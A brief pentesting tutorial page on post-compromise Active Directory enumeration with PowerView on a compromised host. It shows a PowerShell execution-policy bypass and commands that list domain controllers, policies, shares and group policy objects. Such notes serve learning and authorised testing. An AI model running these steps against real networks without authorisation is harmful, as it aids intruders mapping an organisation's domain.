Powerview

You need first to download PowerView to the host you compromised (up to you how you want to do it)

Now we need to launch powershell and bypass the execution policy by doing :

powershell -ep bypass

next we need to load PowerView :

. .\PowerView.ps1

Now obviously this script can retrieve a lot of information, you can for example get information about the domain by :

Get-NetDomain

or DC :

Get-NetDomainController

If for example you want to check a particular attribute (say, system access) of the Domain policy you can :

(Get-DomainPolicy)."system access"

Look for shares :

Invoke-ShareFinder

GPO:

Get-NetGPO

a cheat sheet is available here :

PreviousPost-Compromise EnumerationNextPingCastle

Last updated